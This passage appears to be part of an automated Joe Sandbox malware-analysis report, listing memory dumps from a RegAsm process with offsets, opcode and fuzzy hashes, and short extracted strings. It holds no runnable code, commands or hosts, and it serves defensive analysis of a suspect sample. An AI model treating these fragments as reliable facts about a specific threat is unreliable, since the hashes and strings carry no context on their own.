                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f23c8c1545dab946f8021c73dffefa0ee6e3f9f63d87836a84ff0ca407fb78ae
                                                                    • Instruction ID: 36827e1b5877147c8239a5d9ec7bd8d37695818a0c8f1d2c0b663839245b764e
                                                                    • Opcode Fuzzy Hash: f23c8c1545dab946f8021c73dffefa0ee6e3f9f63d87836a84ff0ca407fb78ae
                                                                    • Instruction Fuzzy Hash: D4F031349002189FDB41FFAAF840A9DBBB1EB40305F5086A9D5159F258EA716E098B82
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540310464.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_68c0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                                                    • API String ID: 0-1298971921
                                                                    • Opcode ID: 7d20605299c93e71ed1d35df49d0d1ac6812cd642d8a5aa2de80fcf2997864ee
                                                                    • Instruction ID: 7a13e69a39c430bfa73896fdd0e539030d05a0ab2ca79f34cdff365861c45d7d
                                                                    • Opcode Fuzzy Hash: 7d20605299c93e71ed1d35df49d0d1ac6812cd642d8a5aa2de80fcf2997864ee
                                                                    • Instruction Fuzzy Hash: AC120B30E00219CFDB64DB69D854B9EB7B2BF88315F248569E50AEB254DB30ED81CF91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540310464.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_68c0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0oEp$DqEp$PHq
                                                                    • API String ID: 0-1091281320
                                                                    • Opcode ID: c286d1966b3a1e13025c1f37426172cf360d1ea82cdb44bb73f56a4cf5ba5475
                                                                    • Instruction ID: 4615b4ad3d6266b9d59422f8ba2e1ff2fab7b4495bde4546fe789219c378d049
                                                                    • Opcode Fuzzy Hash: c286d1966b3a1e13025c1f37426172cf360d1ea82cdb44bb73f56a4cf5ba5475
                                                                    • Instruction Fuzzy Hash: E6228F30B102058FDBA4DB68D494A6EBBF2FF89320F248569E50ADB355DB31EC45CB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540310464.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_68c0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: XPq$\Oq
                                                                    • API String ID: 0-3725437444
                                                                    • Opcode ID: 1b9c657c6f25eab2d94212c9472818024171230e4adbcba1039b973db3318f78
                                                                    • Instruction ID: af0e8b25a74947d530f49434b2e878292f0424aa20d9e38c318002f706d56a55
                                                                    • Opcode Fuzzy Hash: 1b9c657c6f25eab2d94212c9472818024171230e4adbcba1039b973db3318f78
                                                                    • Instruction Fuzzy Hash: B6E1CF31B201148FDB64DB6CD890AAEBBF2EB89320F25846EE606DB351CA71DC41C791
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 43e153b7908a7df49e9d24c46487cfa525db5344e38de8ac87b332f59a9c1c86
                                                                    • Instruction ID: 6b0a73a9dc27935f77db31d9de0c5478f420108fe214490332deae9732c934e9
                                                                    • Opcode Fuzzy Hash: 43e153b7908a7df49e9d24c46487cfa525db5344e38de8ac87b332f59a9c1c86
                                                                    • Instruction Fuzzy Hash: 4BB14F70E40209CFDF24CFA9D8957DDBBF2AF88308F14D129D415AB294EBB4A845CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540504591.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_6a10000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dee6871e2ee26d4f7a7b2f8921e0312389a071489a1edc044ff615b6e1a8edda
                                                                    • Instruction ID: cfa49ce84d72d41ec9daadf7038c4fd6d37e22be0d22c3c6a8ba8b291ede08f9
                                                                    • Opcode Fuzzy Hash: dee6871e2ee26d4f7a7b2f8921e0312389a071489a1edc044ff615b6e1a8edda
                                                                    • Instruction Fuzzy Hash: 3BA19032E013198FCF45EFB5C94459EB7B2FF85300B1541AAEA16AF261DB35E946CB80